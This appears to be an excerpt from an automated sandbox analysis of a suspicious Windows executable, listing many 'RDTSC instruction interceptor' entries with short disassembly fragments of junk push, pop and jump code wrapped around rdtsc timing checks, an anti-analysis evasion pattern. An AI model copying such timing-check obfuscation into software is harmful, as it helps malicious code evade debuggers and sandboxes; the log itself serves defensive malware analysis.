        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D626C5 second address: D626CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D626CC second address: D626EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F590909A3ECh 0x0000000b jng 00007F590909A3E6h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 jmp 00007F590909A3EBh 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D626EF second address: D626F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41539 second address: D4155C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F590909A3F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4155C second address: D41560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB257 second address: DAB285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F590909A3F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB285 second address: DAB2C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5908B64E79h 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F5908B64E66h 0x00000014 jmp 00007F5908B64E78h 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB2C5 second address: DAB2C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB946 second address: DAB94B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB94B second address: DAB95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F590909A3E6h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD77E second address: DAD78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 ja 00007F5908B64E66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD78C second address: DAD7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F590909A3E6h 0x0000000d jmp 00007F590909A3ECh 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD7A5 second address: DAD7D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E77h 0x00000007 jmp 00007F5908B64E73h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB649E second address: DB64AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F590909A3E6h 0x00000009 jns 00007F590909A3E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB661A second address: DB661F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB690E second address: DB6912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5FC8 second address: DB5FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F5908B64E6Ch 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5FE8 second address: DB5FFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F0h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6EC0 second address: DB6EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6EC6 second address: DB6ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6ED0 second address: DB6ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6ED4 second address: DB6ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7043 second address: DB705E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E75h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB705E second address: DB7064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7064 second address: DB7068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA77A second address: DBA780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA780 second address: DBA784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE9D4 second address: DBE9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE9D9 second address: DBEA0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E78h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5908B64E73h 0x0000000e jns 00007F5908B64E66h 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEA0E second address: DBEA29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEA29 second address: DBEA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5908B64E6Dh 0x00000009 pop esi 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEA3B second address: DBEA5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F5h 0x00000007 pushad 0x00000008 jnl 00007F590909A3E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED3E second address: DBED42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED42 second address: DBED4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF18E second address: DBF1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F5908B64E71h 0x0000000c jmp 00007F5908B64E6Ah 0x00000011 popad 0x00000012 jne 00007F5908B64E6Ch 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c jmp 00007F5908B64E78h 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF1DE second address: DBF1E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF336 second address: DBF33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF33C second address: DBF340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF340 second address: DBF344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF911 second address: DBF91F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F590909A3ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF91F second address: DBF923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF923 second address: DBF929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF929 second address: DBF92F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF92F second address: DBF93C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF93C second address: DBF94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jne 00007F5908B64E6Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFEFC second address: DBFF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFF04 second address: DBFF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5908B64E79h 0x00000009 pop ecx 0x0000000a js 00007F5908B64E6Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC234D second address: DC2368 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F590909A3F3h 0x0000000c pop edi 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2368 second address: DC2384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5908B64E78h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2384 second address: DC2388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2388 second address: DC238E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC238E second address: DC2397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5165 second address: DC5198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5908B64E78h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F5908B64E72h 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6EA0 second address: DC6EC2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F590909A3E6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F590909A3F3h 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6EC2 second address: DC6EE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E6Fh 0x00000007 jmp 00007F5908B64E6Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCC0D2 second address: DCC0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCC0D9 second address: DCC0ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E6Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCC0ED second address: DCC0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCC38B second address: DCC38F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCC38F second address: DCC3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F590909A3F9h 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCC504 second address: DCC537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E74h 0x00000007 jmp 00007F5908B64E77h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCC937 second address: DCC954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F590909A3E6h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F590909A3ECh 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCC954 second address: DCC95E instructions: 0x00000000 rdtsc 0x00000002 je 00007F5908B64E66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCD2EE second address: DCD305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F590909A3F3h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD162D second address: DD1648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5908B64E75h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1648 second address: DD165F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F590909A3E6h 0x0000000a jmp 00007F590909A3EDh 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD165F second address: DD1663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1663 second address: DD167B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 js 00007F590909A3E6h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD167B second address: DD16A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5908B64E6Eh 0x00000010 jmp 00007F5908B64E6Dh 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD17D1 second address: DD17EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F590909A3EFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD17EB second address: DD17F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5908B64E66h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD194C second address: DD1957 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F590909A3E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4AC5 second address: DD4AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5908B64E6Eh 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43104 second address: D43109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDA43C second address: DDA4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5908B64E66h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jc 00007F5908B64E66h 0x0000001a popad 0x0000001b jno 00007F5908B64E6Ch 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F5908B64E73h 0x0000002a jmp 00007F5908B64E76h 0x0000002f jmp 00007F5908B64E75h 0x00000034 popad 0x00000035 push edi 0x00000036 pushad 0x00000037 popad 0x00000038 jmp 00007F5908B64E73h 0x0000003d pop edi 0x0000003e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDAA27 second address: DDAA55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F590909A3EFh 0x0000000f jmp 00007F590909A3F5h 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDAA55 second address: DDAA59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDACB1 second address: DDACE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F590909A3F1h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDACE0 second address: DDACEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5908B64E66h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDACEA second address: DDACEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDB2A4 second address: DDB2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDB52F second address: DDB533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDB807 second address: DDB826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F5908B64E6Dh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDBB47 second address: DDBB4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDBDF0 second address: DDBDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC0B4 second address: DDC0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC0B8 second address: DDC0FF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5908B64E66h 0x00000008 jmp 00007F5908B64E74h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jmp 00007F5908B64E71h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a jmp 00007F5908B64E72h 0x0000001f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE638C second address: DE6390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6A8D second address: DE6A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6A91 second address: DE6A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6A97 second address: DE6AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F5908B64E78h 0x0000000c jmp 00007F5908B64E72h 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6AB5 second address: DE6AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F590909A3E6h 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC9D5 second address: DEC9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5908B64E73h 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC9EE second address: DECA00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F590909A3E6h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECA00 second address: DECA1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jno 00007F5908B64E80h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F5908B64E66h 0x00000017 jo 00007F5908B64E66h 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECE37 second address: DECE67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F7h 0x00000007 jmp 00007F590909A3EBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F590909A3EEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECE67 second address: DECE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECE6D second address: DECE7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F590909A3E6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
